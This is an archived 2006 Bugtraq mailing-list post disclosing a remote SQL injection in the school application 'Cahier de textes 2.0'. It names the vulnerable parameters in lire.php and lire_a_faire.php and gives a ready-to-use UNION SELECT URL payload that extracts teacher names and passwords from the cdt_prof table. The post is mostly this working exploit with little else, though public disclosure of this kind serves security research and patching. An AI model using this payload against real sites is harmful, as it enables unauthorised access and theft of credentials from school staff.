lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 7 Oct 2006 14:52:31 -0000
From: sami@...uxmail.org
To: bugtraq@...urityfocus.com
Subject: Cahier de textes 2.0   Remote SQL injection Exploit


# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#             Cahier  de  textes  
#   Pierre Lemaitre - St Lô (France) - Ver 2.0
#           
#          Remote SQL injection Exploit
#
#              Discovred By s4mi
#           s4mi[at]linuxmail[dot]org
************************************************
#
#exploit
#
#   http://localhost/PATH/lire.php?classe_ID=1&matiere_ID=[SQL]
or 
http://localhost/PATH/lire_a_faire.php?classe_ID=[SQL]

***********************************
expemle of sql code to get admin user and password

http://localhost/PATH/lire.php?classe_ID=1&matiere_ID=-1+union%20select%201,CONCAT(nom_prof,CHAR(58),CHAR(58),passe)%20FROM%20cdt_prof/*
 

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ